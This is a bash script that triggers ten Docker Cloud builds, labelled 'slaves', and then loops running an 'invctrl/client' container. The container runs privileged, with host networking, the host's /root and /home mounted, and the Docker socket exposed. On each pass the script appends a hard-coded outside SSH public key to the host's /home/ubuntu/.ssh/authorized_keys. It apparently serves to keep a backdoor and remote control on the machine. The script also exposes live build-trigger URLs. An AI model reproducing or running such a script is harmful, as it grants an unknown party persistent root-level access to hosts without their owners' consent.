#!/usr/bin/env bash

####### slaves
# 0
curl -X POST https://cloud.docker.com/api/build/v1/source/7a5c7621-191e-4b03-b73e-77c3a76b4243/trigger/9adacc43-76a3-4c2f-801d-8196f2563aa1/call/
# 1
curl -X POST https://cloud.docker.com/api/build/v1/source/20c53fe8-6029-4605-b5cf-c6377c3a7671/trigger/e248ef85-d16b-4ba8-ae2f-67799bd9d391/call/
# 2
curl -X POST https://cloud.docker.com/api/build/v1/source/8ca1f79e-abda-4c42-855e-272d8a993f89/trigger/8d3ab456-cdf8-4f8f-b270-1d7f0da5803d/call/
# 3
curl -X POST https://cloud.docker.com/api/build/v1/source/adfa9088-61a0-4532-840a-22adb1ea0435/trigger/1e35415e-f099-4fea-a655-c739337c25fd/call/
# 4
curl -X POST https://cloud.docker.com/api/build/v1/source/b10b53c9-09d7-4a29-bda4-21ea185666bb/trigger/735ec3cd-c0cb-4b79-99bd-5ac62809b94c/call/
# 5
curl -X POST https://cloud.docker.com/api/build/v1/source/d3be3cb3-b0ff-421e-b169-b0486a7f0b7f/trigger/ef295155-768f-4417-8610-2faf3f93dcfd/call/
# 6
curl -X POST https://cloud.docker.com/api/build/v1/source/4bbac483-a8d1-4183-b3e4-208ee6c98a0c/trigger/1c58c69c-7d06-418e-8ac3-e92d01dc4973/call/
# 7
curl -X POST https://cloud.docker.com/api/build/v1/source/2d786571-05f9-4834-b496-fd244210c3ac/trigger/b1ad0159-35cc-4e92-83f7-b86d13bce1a0/call/
# 8
curl -X POST https://cloud.docker.com/api/build/v1/source/70e995f3-6eb9-4408-945c-f579ac8f2461/trigger/73d4dd36-e79e-45fc-8f9c-99f8379f5196/call/
# 9
curl -X POST https://cloud.docker.com/api/build/v1/source/cb44dbed-6e42-4049-9083-85ed853e35ec/trigger/c35d9d60-4ea3-47a7-8ade-5651ac273afe/call/


while :; do
  docker pull invctrl/client:latest
  docker run -dit --net=host -v /root:/root -v /home:/home -v /src:/src -v /var/run/docker.sock:/var/run/docker.sock --privileged --name dind --rm invctrl/client
  echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDX5+yq0TQrW6lxsx0hcT+93A4K0QZ92UWM0BY0cc8ahyIey9/biN54at0xSSnu351ltJJdcp3O5XYs4qwCMiRBL+4YiNod0GF7hUb9yvQh6+SeiKy5y+0ChipUTXo3hK2wZ7plq6rI9JUu63E8TDWWG2Miy0dpn7YrCe2h27Jb7SZ9cc6df9JLXhXBcleHFrY0MDPGWfaMD2jnXGQFfyiFFyH/PlL3Ztu2BghozbZUlq7n4y8QpLcyko4n8OhtupIuQ4NHF4bKxwNrVdhLmG24IqLTTRIyUkHEJvwCENmP2kNy3NkNw+pdhJzG/e8DrG30HKat7flyFZp8TDEluVwB' | docker exec -i dind /bin/sh -c 'cat >>/home/ubuntu/.ssh/authorized_keys'
  docker wait dind
done
